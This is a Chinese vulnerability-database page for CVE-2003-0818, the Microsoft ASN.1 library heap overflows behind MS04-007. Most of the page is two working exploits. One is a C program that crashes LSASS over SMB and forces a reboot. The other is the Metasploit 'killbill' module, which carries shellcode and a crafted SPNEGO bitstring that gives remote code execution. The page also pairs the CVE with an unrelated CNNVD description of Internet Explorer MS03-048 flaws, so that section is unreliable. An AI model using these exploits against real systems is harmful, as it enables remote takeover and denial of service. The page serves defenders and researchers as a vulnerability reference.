CVE-2003-0818
CVSS7.5
发布时间 :2004-03-03 00:00:00
修订时间 :2016-10-17 22:37:36
NMCOEPS    

[原文]Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings.


[CNNVD]Microsoft Internet Explorer多个安全漏洞(MS03-048)(CNNVD-200403-040)

        
        Microsoft Internet Explorer是一款流行的WEB浏览程序。
        Microsoft Internet Explorer存在多个安全问题,可导致任意代码执行,读取本地系统文件,下载任意文件到用户系统。
        具体问题如下:
        - 在相关Internet Explorer的跨域安全模型(从共享信息中保持不同域窗口)中存在三个漏洞,这些漏洞可导致在本地计算机区域中执行任意脚本,要利用这些漏洞,攻击者必须构建包含恶意代码的页面,然后诱使用户访问该页。攻击者也可以构建恶意HTML形式EMAIL消息发送给用户打开。成功利用此漏洞可以从其他WEB站点访问信息,访问用户系统上的文件和在用户上执行任意代码。
        - 在Internet Explorer中把区域信息传递给XML对象时存在安全问题。这个漏洞允许攻击者读取用户系统上的本地问。要利用这个漏洞,攻击者必须构建包含恶意代码的页面,然后诱使用户访问该页。攻击者也可以构建恶意HTML形式EMAIL消息发送给用户打开。在用户浏览恶意站点或查看HTML EMAIL消息后,用户会被提示下载HTML页面,如果用户接收这个HTML文件下载,那么攻击者可以读取已知位置中的本地文件。
        - 在Internet Explorer中在动态HTML事件上执行Drag-and-Drop操作时存在安全问题。如果用户点击,这个漏洞允许文件保存在用户系统中的目标指定目录上。没有任何对话框提示会要求用户下载。要利用这个漏洞,攻击者必须构建包含恶意代码的页面,然后诱使用户访问该页。攻击者也可以构建恶意HTML形式EMAIL消息发送给用户打开。如果用户点击恶意连接,可导致代码保存在用户计算机上。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0:sp5:workstationMicrosoft Windows 4.0 sp5 workstation
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_nt:4.0:sp6:workstationMicrosoft Windows 4.0 sp6 workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:workstationMicrosoft Windows 4.0 sp3 workstation
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_nt:4.0:sp4:workstationMicrosoft Windows 4.0 sp4 workstation
cpe:/o:microsoft:windows_nt:4.0:sp1:workstationMicrosoft Windows 4.0 sp1 workstation
cpe:/o:microsoft:windows_nt:4.0:sp2:workstationMicrosoft Windows 4.0 sp2 workstation
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_nt:4.0:sp6a:serverMicrosoft Windows 4.0 sp6a server
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP5
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP2
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP4
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP1
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstationMicrosoft Windows 4.0 sp6a workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP3
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_nt:4.0:sp5:serverMicrosoft Windows 4.0 sp5 server
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_nt:4.0:sp6:serverMicrosoft Windows 4.0 sp6 server
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_nt:4.0:sp3:serverMicrosoft Windows 4.0 sp3 server
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_nt:4.0:sp4:serverMicrosoft Windows 4.0 sp4 server
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp1:serverMicrosoft Windows 4.0 sp1 server
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp2:serverMicrosoft Windows 4.0 sp2 server
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:799Windows Server 2003 ASN.1 Library Integer Overflow Vulnerabilities
oval:org.mitre.oval:def:797Windows XP ASN.1 Library Integer Overflow Vulnerabilities
oval:org.mitre.oval:def:796Windows NT ASN.1 Library Integer Overflow Vulnerabilities
oval:org.mitre.oval:def:653Windows 2000 ASN.1 Library Integer Overflow Vulnerabilities
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0818
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0818
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-040
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107643836125615&w=2
(UNKNOWN)  BUGTRAQ  20040210 EEYE: Microsoft ASN.1 Library Length Overflow Heap Corruption
http://marc.info/?l=bugtraq&m=107643892224825&w=2
(UNKNOWN)  BUGTRAQ  20040210 EEYE: Microsoft ASN.1 Library Bit String Heap Corruption
http://marc.info/?l=ntbugtraq&m=107650972617367&w=2
(UNKNOWN)  NTBUGTRAQ  20040210 EEYE: Microsoft ASN.1 Library Length Overflow Heap Corruption
http://marc.info/?l=ntbugtraq&m=107650972723080&w=2
(UNKNOWN)  NTBUGTRAQ  20040210 EEYE: Microsoft ASN.1 Library Bit String Heap Corruption
http://www.kb.cert.org/vuls/id/216324
(VENDOR_ADVISORY)  CERT-VN  VU#216324
http://www.kb.cert.org/vuls/id/583108
(UNKNOWN)  CERT-VN  VU#583108
http://www.microsoft.com/technet/security/bulletin/MS04-007.asp
(VENDOR_ADVISORY)  MS  MS04-007
http://www.us-cert.gov/cas/techalerts/TA04-041A.html
(UNKNOWN)  CERT  TA04-041A

- 漏洞信息

Microsoft Internet Explorer多个安全漏洞(MS03-048)
高危 边界条件错误
2004-03-03 00:00:00 2006-03-28 00:00:00
远程  
        
        Microsoft Internet Explorer是一款流行的WEB浏览程序。
        Microsoft Internet Explorer存在多个安全问题,可导致任意代码执行,读取本地系统文件,下载任意文件到用户系统。
        具体问题如下:
        - 在相关Internet Explorer的跨域安全模型(从共享信息中保持不同域窗口)中存在三个漏洞,这些漏洞可导致在本地计算机区域中执行任意脚本,要利用这些漏洞,攻击者必须构建包含恶意代码的页面,然后诱使用户访问该页。攻击者也可以构建恶意HTML形式EMAIL消息发送给用户打开。成功利用此漏洞可以从其他WEB站点访问信息,访问用户系统上的文件和在用户上执行任意代码。
        - 在Internet Explorer中把区域信息传递给XML对象时存在安全问题。这个漏洞允许攻击者读取用户系统上的本地问。要利用这个漏洞,攻击者必须构建包含恶意代码的页面,然后诱使用户访问该页。攻击者也可以构建恶意HTML形式EMAIL消息发送给用户打开。在用户浏览恶意站点或查看HTML EMAIL消息后,用户会被提示下载HTML页面,如果用户接收这个HTML文件下载,那么攻击者可以读取已知位置中的本地文件。
        - 在Internet Explorer中在动态HTML事件上执行Drag-and-Drop操作时存在安全问题。如果用户点击,这个漏洞允许文件保存在用户系统中的目标指定目录上。没有任何对话框提示会要求用户下载。要利用这个漏洞,攻击者必须构建包含恶意代码的页面,然后诱使用户访问该页。攻击者也可以构建恶意HTML形式EMAIL消息发送给用户打开。如果用户点击恶意连接,可导致代码保存在用户计算机上。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在Internet和Intranet区中运行ActiveX控件和活动脚本前要求提示。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-048)以及相应补丁:
        MS03-048:Cumulative Security Update for Internet Explorer (824145)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-048.asp

        补丁下载:
        Internet Explorer 6 Service Pack 1:
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=9D8543E9-0E2B-46C9-B6C6-12DE03860465&displaylang=en

        Internet Explorer 6 Service Pack 1 (64-Bit Edition):
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=35F99CF5-3629-4E0E-BF60-24845D2D20C9&displaylang=en

        Internet Explorer 6 Service Pack 1 for Windows Server 2003:
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=7D0D02DD-8940-48E0-B163-3FCDCB558F21&displaylang=en

        Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition):
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=8BEFA1EC-0C48-4B65-989D-58B0CE1E6F95&displaylang=en

        Internet Explorer 6:
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=4C4D22F0-FBF7-4EA6-9CC2-27D104D4198E&displaylang=en

        Internet Explorer 5.5 Service Pack 2:
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=E438AFD4-DF70-448C-8925-1075C8BE6C5E&displaylang=en

        Internet Explorer 5.01 Service Pack 4:
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=C15E2DB3-14E2-43A4-A1A1-676374B66517&displaylang=en

        Internet Explorer 5.01 Service Pack 3:
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=F4853D8F-F66C-4D8A-9979-3B4F540F90A8&displaylang=en

        Internet Explorer 5.01 Service Pack 2:
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=221616D4-5893-4DA4-A223-B0DE548D6D83&displaylang=en

- 漏洞信息 (153)

MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007) (EDBID:153)
windows dos
2004-02-14 Verified
0 Christophe Devine
N/A [点击下载]
/*
 *  MS04-007 Exploit LSASS.EXE Win2k Pro Remote Denial-of-Service
 *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

 /*
  *   > MS04-007-dos.exe 10.0.0.1 445
  *   connect failed
  *
  *   > nbtstat -A 10.0.0.1
  *   [..]
  *       SERVER3        <20>  UNIQUE      Registered
  *   [..]
  *   > MS04-007-dos.exe 10.0.0.1 139 SERVER3
  *   > MS04-007-dos.exe 10.0.0.1 139 SERVER3
  *   >
  *
  *   if the exploit works, LSASS gets killed,
  *   and after 1mn the server reboots.
  *  
  */

//#define WIN32

#ifdef WIN32

#include <winsock2.h>
#include <windows.h>

#else

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#endif

#include <stdio.h>

/****************************************************************/

unsigned char netbios_sess_req[] =

/* NetBIOS Session Request */

"\x81\x00\x00\x44"

"\x20\x45\x45\x45\x46\x45\x47\x45\x42\x46\x46\x45\x4D\x46\x45\x43"
"\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43"
"\x41\x00"

"\x20\x45\x45\x45\x46\x45\x47\x45\x42\x46\x46\x45\x4D\x46\x45\x43"
"\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41"
"\x41\x00";

/****************************************************************/

unsigned char negotiate_req[] =

/* NetBIOS Message Type + Length & SMB Header */

"\x00\x00\x00\xB3"

"\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\x03\x00\x00\x02\x00"

/* Negotiate Protocol Request, actually sniffed from smbclient */

"\x00\x90\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F\x52\x4B\x20\x50"
"\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02\x4D\x49\x43\x52"
"\x4F\x53\x4F\x46\x54\x20\x4E\x45\x54\x57\x4F\x52\x4B\x53\x20\x31"
"\x2E\x30\x33\x00\x02\x4D\x49\x43\x52\x4F\x53\x4F\x46\x54\x20\x4E"
"\x45\x54\x57\x4F\x52\x4B\x53\x20\x33\x2E\x30\x00\x02\x4C\x41\x4E"
"\x4D\x41\x4E\x31\x2E\x30\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x44\x4F\x53\x20\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31"
"\x00\x02\x53\x61\x6D\x62\x61\x00\x02\x4E\x54\x20\x4C\x41\x4E\x4D"
"\x41\x4E\x20\x31\x2E\x30\x00\x02\x4E\x54\x20\x4C\x4D\x20\x30\x2E"
"\x31\x32\x00";

/****************************************************************/

unsigned char setup_request[] =

/* NetBIOS Message Type + Length & SMB Header */

"\x00\x00\xCC\xCC"

"\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\x03\x00\x00\x03\x00"

/* Session Setup AndX Request */

"\x0C\xFF\x00\x00\x00\xFF\xFF\x02\x00\x01\x00\x00\x00\x00\x00\xCC"
"\xCC\x00\x00\x00\x00\x5C\x00\x00\x80\xCC\xCC";

/* Security Blob: SPNEGO OID + ASN.1 stuff */

unsigned char security_blob[] =

/* Application Constructed Object + SPNEGO OID */

"\x60\x82\xCC\xCC\x06\x06\x2B\x06\x01\x05\x05\x02"

/* negTokenInit + Constructed Sequence */

"\xA0\x82\xCC\xCC\x30\x82\xCC\xCC"

/* mechType: NTLMSSP OID */

"\xA0\x0E\x30\x0C\x06\x0A\x2B\x06\x01\x04\x01\x82\x37\x02\x02\x0A"

/* reqFlags that should trigger the overflow */

"\xA1\x05\x23\x03\x03\x01\x07"

/* mechToken: NTLMSSP (room for shellcode here) */

"\xA2\x82\xCC\xCC\x04\x82\xCC\xCC"

"\x4E\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x15\x02\x08\x60"
"\x09\x00\x09\x00\x20\x00\x00\x00\x07\x00\x07\x00\x29\x00\x00\x00"
"\x57\x4F\x52\x4B\x47\x52\x4F\x55\x50\x44\x45\x46\x41\x55\x4C\x54";

/* Native OS & LAN Manager */

unsigned char other_stuff[] =

"\x00\x55\x00\x6E\x00\x69\x00\x78\x00\x00\x00\x53\x00\x61\x00\x6D"
"\x00\x62\x00\x61\x00\x00\x00";

/****************************************************************/

int main( int argc, char *argv[] )
{
    unsigned char buf[4096];
    struct hostent *server_host;
    struct sockaddr_in server_addr;
    int i, len, server_fd, n1, n2, n3;

#ifdef WIN32

    WSADATA wsa;

    /* initialize windows sockets */

    if( WSAStartup( MAKEWORD(2,0), &wsa ) )
    {
        fprintf( stderr, "WSAStartup failed\n" );
        return( 1 );
    }

#endif

    if( argc != 3 && argc != 4 )
    {
        fprintf( stderr, "usage: %s <target hostname> "
                         "<port> [netbios name]\n",
                 argv[0] );

        return( 1 );
    }

    /* resolve the server hostname and connect */

    server_host = gethostbyname( argv[1] );

    if( server_host == NULL )
    {
        fprintf( stderr, "gethostbyname(%s) failed\n", argv[1] );
        return( 1 );
    }

    memcpy( (void *) &server_addr.sin_addr,
            (void *) server_host->h_addr,
            server_host->h_length );

    sscanf( argv[2], "%d", &i );

    server_addr.sin_family = AF_INET;
    server_addr.sin_port   = htons( (unsigned short) i );

    server_fd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );

    if( server_fd < 0 )
    {
        fprintf( stderr, "could not create socket\n" );
        return( 1 );
    }

    len = sizeof( server_addr );

    if( connect( server_fd, (struct sockaddr *)
                 &server_addr, len ) < 0 )
    {
        fprintf( stderr, "connect failed\n" );
        return( 1 );
    }

    if( argc == 4 )
    {
        /* encode the Called NetBIOS Name */

        len = sizeof( netbios_sess_req ) - 1;
        memcpy( buf, netbios_sess_req, len );
        memset( buf + 5, 'A', 32 );

        for( i = 0; i < (int) strlen( argv[3] ); i++ )
        {
            buf[5 + i * 2] += argv[3][i] >> 4;
            buf[6 + i * 2] += argv[3][i] & 15;
        }

        for( ; i < 16; i++ )
        {
            buf[5 + i * 2] += 0x20 >> 4;
            buf[6 + i * 2] += 0x20 & 15;
        }

        /* 1. NetBIOS Session Request */

        if( send( server_fd, buf, len, 0 ) != len )
        {
            fprintf( stderr, "send(NetBIOS Session Request) failed\n" );
            return( 1 );
        }

        if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 )
        {
            fprintf( stderr, "recv(NetBIOS Session Response) failed\n" );
            return( 1 );
        }

        if( buf[0] == 0x83 )
        {
            fprintf( stderr, "NetBIOS Session rejected "
                             "(wrong NetBIOS name ?)\n" );
            return( 1 );
        }
    }

    /* 2. Negotiate Protocol Request */

    len = sizeof( negotiate_req ) - 1;

    if( send( server_fd, negotiate_req, len, 0 ) != len )
    {
        fprintf( stderr, "send(Negotiate Protocol Request) failed\n" );
        return( 1 );
    }

    if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 )
    {
        fprintf( stderr, "recv(Negotiate Protocol Response) failed\n" );
        return( 1 );
    }

    /* 3. Session Setup AndX Request */

    memset( buf, 'A', sizeof( buf ) );

    n1 = sizeof( setup_request ) - 1;
    n2 = sizeof( security_blob ) - 1;
    n3 = sizeof( other_stuff   ) - 1;

    memcpy( buf,           setup_request, n1 );
    memcpy( buf + n1,      security_blob, n2 );

    n2 += 2000; /* heap padding for shellcode */

    memcpy( buf + n1 + n2, other_stuff,   n3 );

    len = n1 + n2 + n3;

    buf[ 2] = ( ( len - 4 ) >> 8 ) & 0xFF;      /* NetBIOS msg length   */
    buf[ 3] = ( ( len - 4 )      ) & 0xFF;

    buf[51] = ( n2      ) & 0xFF;               /* Security Blob Length */
    buf[52] = ( n2 >> 8 ) & 0xFF;

    buf[61] = ( ( n2 + n3 )      ) & 0xFF;      /* Byte Count (BCC)     */
    buf[62] = ( ( n2 + n3 ) >> 8 ) & 0xFF;

    buf[n1 +  2] = ( ( n2 -  4 ) >> 8 ) & 0xFF; /* ACO Length           */
    buf[n1 +  3] = ( ( n2 -  4 )      ) & 0xFF;

    buf[n1 + 14] = ( ( n2 - 16 ) >> 8 ) & 0xFF; /* negTokenInit Length  */
    buf[n1 + 15] = ( ( n2 - 16 )      ) & 0xFF;

    buf[n1 + 18] = ( ( n2 - 20 ) >> 8 ) & 0xFF; /* Constr. Seq. Length  */
    buf[n1 + 19] = ( ( n2 - 20 )      ) & 0xFF;

    buf[n1 + 45] = ( ( n2 - 47 ) >> 8 ) & 0xFF; /* mechToken Length     */
    buf[n1 + 46] = ( ( n2 - 47 )      ) & 0xFF;

    buf[n1 + 49] = ( ( n2 - 51 ) >> 8 ) & 0xFF; /* String Length        */
    buf[n1 + 50] = ( ( n2 - 51 )      ) & 0xFF;

    if( send( server_fd, buf, len, 0 ) != len )
    {
        fprintf( stderr, "send(Session Setup AndX Request) failed\n" );
        return( 1 );
    }

    recv( server_fd, buf, sizeof( buf ), 0 );

    shutdown( server_fd, 2 );

    return( 0 );
}



// milw0rm.com [2004-02-14]
		

- 漏洞信息 (16377)

Microsoft ASN.1 Library Bitstring Heap Overflow (EDBID:16377)
windows remote
2010-07-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms04_007_killbill.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = LowRanking

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
			'Description'    => %q{
					This is an exploit for a previously undisclosed
				vulnerability in the bit string decoding code in the
				Microsoft ASN.1 library. This vulnerability is not related
				to the bit string vulnerability described in eEye advisory
				AD20040210-2. Both vulnerabilities were fixed in the
				MS04-007 patch.

				You are only allowed one attempt with this vulnerability. If
				the payload fails to execute, the LSASS system service will
				crash and the target system will automatically reboot itself
				in 60 seconds. If the payload succeeeds, the system will no
				longer be able to process authentication requests, denying
				all attempts to login through SMB or at the console. A
				reboot is required to restore proper functioning of an
				exploited system.

				This exploit has been successfully tested with the win32/*/reverse_tcp
				payloads, however a few problems were encounted when using the
				equivalent bind payloads. Your mileage may vary.

			},
			'Author'         => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
			'License'        => GPL_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2003-0818'],
					[ 'OSVDB', '3902' ],
					[ 'BID', '9633'],
					[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
					[ 'MSB', 'MS04-007'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
						{
							'Platform' => 'win',
						},
					],
				],
			'DisclosureDate' => 'Feb 10 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('PROTO', [ true,  "Which protocol to use: http or smb", 'smb']),
			], self.class)
	end

	# This exploit is too destructive to use during automated exploitation.
	# Better Windows-based exploits exist at this time (Sep 2006)
	def autofilter
		false
	end

	# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
	# as a Metasploit Framework module with his permission. This module is only
	# licensed under GPLv2, keep this in mind if you embed the Framework into
	# a non-GPL application. -hdm[at]metasploit.com

	def exploit

		# The first stage shellcode fixes the PEB pointer and cleans the heap
		stage0 =
			"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
			"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
			"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
			"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
			"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
			"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
			"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
			"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
			"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
			"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
			"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
			"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
			"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
			"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
			"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
			"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
			"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
			"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
			"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
			"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
			"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
			"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
			"\x08\x00\xeb\xfe"

		token = spnego_token(stage0, payload.encoded)

		case datastore['PROTO']
			when 'smb'
				exploit_smb(token)
			when 'http'
				exploit_http(token)
			else
				print_status("Invalid application protocol specified, use smb or http")
		end
	end


	def exploit_smb(token)
		connect

		client = Rex::Proto::SMB::Client.new(sock)

		begin
			client.session_request(smb_hostname()) if not datastore['SMBDirect']
			client.negotiate
			client.session_setup_ntlmv2_blob(token)
		rescue => e
			if (e.to_s =~ /error code 0x00050001/)
				print_error("The target system has already been exploited")
			else
				print_error("Error: #{e}")
			end
		end

		handler
		disconnect
	end

	def exploit_http(token)
		connect

		req = "GET / HTTP/1.0\r\n"
		req << "Host: #{ datastore['RHOST']}\r\n"
		req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

		sock.put(req)
		res = sock.get_once

		if (res and res =~ /0x80090301/)
			print_error("This server does not support the Negotiate protocol or has already been exploited")
		end

		if (res and res =~ /0x80090304/)
			print_error("This server responded with error code 0x80090304 (wth?)")
		end

		handler
		disconnect
	end


	# Returns an ASN.1 encoded string
	def enc_asn1(str)
		Rex::Proto::SMB::Utils::asn1encode(str)
	end

	# Returns an ASN.1 encoded bit string with 0 unused bits
	def enc_bits(str)
		"\x03" + enc_asn1("\x00" + str)
	end

	# Returns a BER encoded constructed bit string
	def enc_constr(*str_arr)
		"\x23" + enc_asn1(str_arr.join(''))
	end

	# Returns a BER encoded SPNEGO token
	def spnego_token(stage0, stage1)

		if !(stage0 and stage1)
			print_status("Invalid parameters passed to spnego_token")
			return
		end

		if (stage0.length > 1032)
			print_status("The stage 0 shellcode is longer than 1032 bytes")
			return
		end

		tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

		if ((tag.length + stage1.length) > 1033)
			print_status("The stage 1 shellcode is too long")
			return
		end


		# The first two overwrites must succeed, so we write to an unused location
		# in the PEB block. We don't care about the values, because after this the
		# doubly linked list of free blocks is corrupted and we get to the second
		# overwrite which is more useful.

		fw = "\xf8\x0f\x01\x00"		# 0x00010ff8
		bk = "\xf8\x0f\x01"

		# The second overwrite writes the address of our shellcode into the
		# FastPebLockRoutine pointer in the PEB

		peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

		bitstring = enc_constr(
			enc_bits("A" * 1024),
			"\x03\x00",
			enc_constr(
				enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
				enc_constr( enc_bits(fw + bk) ),
				enc_constr(
					enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
					enc_constr(
						enc_bits("\xeb\x06" + make_nops(6)),
						enc_bits("D" * 1040)
					)
				)
			)
		)

		token = "\x60" + enc_asn1(                 # Application Constructed Object
			"\x06\x06\x2b\x06\x01\x05\x05\x02" +   # SPNEGO OID
			"\xa0" + enc_asn1(					   # NegTokenInit (0xa0)
				"\x30" + enc_asn1(
					"\xa1" + enc_asn1(
						bitstring
					)
				)
			)
		)

		return token
	end

end
		

- 漏洞信息 (F83044)

Microsoft ASN.1 Library Bitstring Heap Overflow (PacketStormID:F83044)
2009-11-26 00:00:00
Solar Eclipse  metasploit.com
exploit,vulnerability
windows
CVE-2003-0818
[点击下载]

